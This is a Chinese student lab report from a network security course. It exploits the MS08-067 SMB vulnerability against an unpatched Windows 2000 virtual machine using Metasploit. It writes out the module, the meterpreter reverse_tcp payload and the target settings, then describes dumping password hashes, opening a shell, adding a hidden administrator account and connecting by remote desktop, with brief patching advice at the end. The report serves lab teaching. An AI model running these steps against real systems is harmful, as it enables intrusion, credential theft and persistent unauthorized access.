版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
1、實驗六報告課程名稱網(wǎng)絡(luò)安全實驗成績實驗名稱緩沖區(qū)溢出攻擊與防范實驗學(xué)號姓名 鄭明毅 班級網(wǎng)絡(luò)工程2班日期2018/6/7實驗報告一、實驗?zāi)康募耙螅?. 實驗?zāi)康耐ㄟ^實驗掌握緩沖區(qū)溢出的原理;理解緩沖區(qū)溢出危險性;理解防范和避免緩沖區(qū)溢出攻擊的措施。2. 實驗要求(1)利用緩沖區(qū)溢出工具或者利用一個簡單的溢出C程序進(jìn)行溢出漏洞攻擊(2)分析緩沖區(qū)溢出攻擊原理和危害(3)給出防范和避免緩沖區(qū)溢出攻擊的措施二、實驗過程及要點:實驗過程:MS08-067( Windows Server服務(wù)RPC請求緩沖區(qū)溢出漏洞)遠(yuǎn)程緩沖區(qū)溢出攻擊測試1 網(wǎng)絡(luò)測試環(huán)境構(gòu)建 首先需要先配置好一個
2、滲透測試用的網(wǎng)絡(luò)環(huán)境,包括如圖1所示的運行win10系統(tǒng)的計算機,如圖2所示的Windows 2000系統(tǒng)(虛擬機環(huán)境下)的計算機。顯然這2臺計算機處于同一個網(wǎng)段中,可以相互通訊,win10系統(tǒng)用作攻擊機,下面將在此系統(tǒng)上運行Metasploit進(jìn)行滲透測試,而Windows 2000系統(tǒng)都是本次任務(wù)中需要進(jìn)行滲透入侵的靶機,保持安裝后的默認(rèn)狀態(tài),沒有打額外的系統(tǒng)安全補丁。圖1 win10攻擊機圖2 Windows 2000 靶機2、掃描靶機在正式開始滲透之前,應(yīng)該對靶機進(jìn)行掃描探測工作,搞清楚滲透目標(biāo)的系統(tǒng)類型、開放的端口服務(wù)、可能存在的安全漏洞等。 在win10攻擊機上運行met
3、asploit console,即可進(jìn)入Metasploit環(huán)境。現(xiàn)在可以利用MSF框架中集成的Nmap掃描器對滲透測試目標(biāo)進(jìn)行掃描,如圖3所示,獲取了靶機的開放服務(wù)和操作系統(tǒng)類型等信息。圖3 windows 2000掃描結(jié)果利用掃描器的腳步插件,還有可能直接探測出目標(biāo)系統(tǒng)的安全漏洞,例如如圖4所示,Nmap利用smb-check-vulns插件掃描探測出了Windows 2000靶機存在MS08_067漏洞,命令執(zhí)行如下:nmap -script=smb-check-vulns。namap掃描的結(jié)果里報告發(fā)現(xiàn)MS08-067:DISABLED。 這是在暗示我們或許能夠?qū)@臺主機進(jìn)行
4、滲透攻擊,然后我們在 Metasloit里面找到此漏洞的攻擊模塊,并嘗試攻擊目標(biāo)機器。MS08-067是一個對操作系統(tǒng)版本依賴非常高的漏洞,所以在這里,我們只自動payload指定一下目標(biāo)就可以確保觸發(fā)正確的溢出代碼。圖4漏洞掃描結(jié)果3利用MS08_067漏洞滲透入侵 MS08-067漏洞的全稱為“Windows Server服務(wù)RPC請求緩沖區(qū)溢出漏洞”,如果用戶在受影響的系統(tǒng)上收到特制的 RPC 請求,則該漏洞可能允許遠(yuǎn)程執(zhí)行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統(tǒng)上,攻擊者可能未經(jīng)身份驗證即可
5、利用此漏洞運行任意代碼,此漏洞可用于進(jìn)行蠕蟲攻擊,目前已經(jīng)有利用該漏洞的蠕蟲病毒。防火墻最佳做法和標(biāo)準(zhǔn)的默認(rèn)防火墻配置,有助于保護(hù)網(wǎng)絡(luò)資源免受從企業(yè)外部發(fā)起的攻擊,默認(rèn)情況下能建立空連接。 既然已經(jīng)知道Windows 2000靶機存在MS08_067漏洞,下面就在Metasploit環(huán)境中利用它進(jìn)行滲透入侵。 首先,輸入search ms08-067查找與其相關(guān)的漏洞攻擊程序,并啟用該滲透攻擊模塊查看基本信息,然后,輸入use exploit/Windows/smb/ms08_067_netapi命令表示選擇利用這個漏洞,如圖5所示。圖5 選擇漏洞如上我們已經(jīng)駕馭了(ms
6、08_067_netapi)這個漏洞攻擊程序,哈哈!接下來我們要找一找metasploit下的有效攻擊荷載(payload),那就使用命令:show payloads來查找一下吧!然后用set命令選擇一旦利用漏洞滲透進(jìn)去使用什么攻擊載荷,這里使用MSF框架里功能強大的Meterpreter攻擊模塊下的反向連接shell載荷,使用命令:set payload windows/meterpreter/reverse_tcp,執(zhí)行如圖6所示。圖6 選擇攻擊載荷完成滲透攻擊模塊與攻擊載荷模塊的選擇之后,需要查看配置滲透攻擊所需的配置選項,具體命令如下:show options用show op
7、tions命令查看還有哪些參數(shù)需要配置,根據(jù)目標(biāo)情況配置滲透攻擊的選項。如圖7所示:圖7 需要配置的參數(shù)now,現(xiàn)在我們需要設(shè)置ip咯,設(shè)置命令:set RHOST 192.168.56.101 set LHOST配置本地攻擊機和遠(yuǎn)程靶機的IP地址,如圖8所示圖8配置參數(shù)現(xiàn)在呢,我們基本已設(shè)置完成,接下來我們show一下看看自己的配置都在不?確認(rèn)一下信息:(看到了吧,我們的配置沒問題吧!Ip都有了?。。﹫D9 檢查配置參數(shù)所有需要的參數(shù)配置好了以后,在進(jìn)行exploit滲透攻擊時,會出現(xiàn)一些狀況,有可能滲透不成功,需要在這時候謹(jǐn)慎。用exploit或run命令發(fā)動攻擊,如圖10所示,滲透成功后,
8、設(shè)置的回連主機就是Metasploit攻擊主機,攻擊主機會獲得一個meterpreter控制會話session。圖10 成功獲取session吼吼!成功了!已成功拿下對方主機,那么現(xiàn)在你要做什么呢?好的,告訴你一句話:好戲開鑼咯···是時候讓你體驗一下當(dāng)黑客的感覺了!Hello,hacker還等什么呢?好吧,廢話少說,第一個“破壞”玩起!哈哈!實例1 從靶機拿到的ipconfig/all,如圖11圖11從靶機拿到的ipconfig/all實例2獲得系統(tǒng)當(dāng)前的進(jìn)程列表,如圖12:圖12 windows2000進(jìn)程列表實例3:獲得當(dāng)前的工作目錄和用戶id,如圖13:圖
9、13 windows2000的工作目錄和用戶id實例4:獲得目標(biāo)系統(tǒng)的password hash,如圖14:圖14 windows 2000的password hash實例5:獲得目標(biāo)系統(tǒng)的DOS shell,用了meterpreter的session后,即可用各種命令對遠(yuǎn)程靶機進(jìn)行操作,如圖15所示。圖15 獲得windows 2000的DOS shell實例6:那我就和靶機簡單比較一下命令:ipconfig/all吧!圖16 shell拿到的windows 2000的ipconfig/all從靶機拿到的ipconfig/all,如圖17:圖17 靶機拿到的ipconfig/all
10、實例7 在目標(biāo)靶機上新建了一個賬號zmy和密碼479(這里用的是我的姓名鄭明毅學(xué)號479),并將其加入到管理員組。為后續(xù)的遠(yuǎn)程控制提供方便,如圖18、19、20所示:(簡單解釋一下啊win10截圖中所有問號問題:那是因為漢字編碼問題:可能是UTF-8的緣故吧?。?圖18 查看賬號圖19 新建賬號圖20 賬號加入管理員組實例8 查看3389端口是否打開(這里已經(jīng)打開了)如圖21,然后用mstsc遠(yuǎn)程桌面連接(因為windows2000專業(yè)版沒有3389遠(yuǎn)程端口,所以我這里又安裝了一個windows2000服務(wù)器版的系統(tǒng),ip地址為192.168.56.102 用戶名zmy 密碼479)圖21 查看3389是否打開圖22添加用戶名zmy 密碼479并設(shè)置為Administrators組啟動mstsc遠(yuǎn)程桌面連接,如圖23:圖23 遠(yuǎn)程桌面連接4. 防范Ms08-067遠(yuǎn)程溢出攻擊由于這個漏洞是致命的,所以一旦被入侵后果將不堪設(shè)想,因此我們可以微軟的官方站點,下載編號為KB958644的補丁,對其漏洞進(jìn)行修補。再則通過關(guān)閉Computer browser、server、wor
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 月餅黏土課件教學(xué)課件
- 整形護(hù)理課件教學(xué)課件
- 完整足球模塊教案
- 臨沂體育制造行業(yè)勞動合同范本
- 乳品行業(yè)入職合同樣本
- 個人租車協(xié)議書城市通勤
- 交通運輸服務(wù)協(xié)議書格式
- 會計主管勞動合同樣本
- 井控管理十七項核心策略
- 會展活動合同糾紛案例分析
- 年度客艙清潔總結(jié):成功經(jīng)驗與不足反思
- 書法等級考試試題含答案一至九級
- 應(yīng)急救援基地項目可行性研究報告
- 走馬燈內(nèi)部蠟燭距離與其旋轉(zhuǎn)速度關(guān)系的探究實驗假設(shè)
- 對講產(chǎn)品行業(yè)分析報告
- 預(yù)防校園欺凌法治知識競答題庫及答案
- 2022級西學(xué)中班《中藥學(xué)》考試試題
- 意大利(百得)TBG 系列燃燒機說明書
- 2023年新課標(biāo)I卷現(xiàn)代文閱讀II《給兒子》講評課件
- 2022-2023學(xué)年湖南省長沙市雅禮集團九年級(上)期中物理試卷
- 規(guī)范中C20-C80混凝土本構(gòu)關(guān)系
評論
0/150
提交評論